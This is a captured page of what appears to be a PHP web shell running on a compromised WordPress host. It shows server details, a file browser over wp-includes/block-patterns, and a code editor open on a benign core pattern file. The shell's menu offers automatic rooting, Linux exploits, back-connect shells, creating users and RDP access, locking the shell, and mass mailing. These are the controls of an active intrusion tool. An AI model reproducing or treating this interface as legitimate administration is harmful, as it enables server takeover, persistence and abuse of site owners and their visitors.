Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www /
wp-includes /
block-patterns /
[ HOME SHELL ]
Name
Size
Permission
Action
heading-paragraph.php
1.12
KB
-rw-r--r--
large-header-button.php
2.61
KB
-rw-r--r--
large-header.php
1.29
KB
-rw-r--r--
quote.php
1.34
KB
-rw-r--r--
text-three-columns-buttons.php
2.55
KB
-rw-r--r--
text-two-columns-with-images.p...
2.32
KB
-rw-r--r--
text-two-columns.php
2.11
KB
-rw-r--r--
three-buttons.php
1.72
KB
-rw-r--r--
two-buttons.php
1.08
KB
-rw-r--r--
two-images.php
992
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : two-images.php
<?php /** * Two images side by side block pattern. * * @package WordPress */ return array( 'title' => __( 'Two images side by side' ), 'categories' => array( 'gallery' ), 'description' => _x( 'An image gallery with two example images.', 'Block pattern description' ), 'content' => "<!-- wp:gallery {\"ids\":[null,null],\"align\":\"wide\"} -->\n<figure class=\"wp-block-gallery alignwide columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"https://s.w.org/images/core/5.5/don-quixote-05.jpg\" alt=\"" . __( 'An old pencil drawing of Don Quixote and Sancho Panza sitting on their horses, by Wilhelm Marstrand.' ) . '"/></figure></li><li class="blocks-gallery-item"><figure><img src="https://s.w.org/images/core/5.5/don-quixote-01.jpg" alt="' . __( 'An old pencil drawing of Don Quixote and Sancho Panza sitting on their horses, by Wilhelm Marstrand.' ) . "\"/></figure></li></ul></figure>\n<!-- /wp:gallery -->", );
Close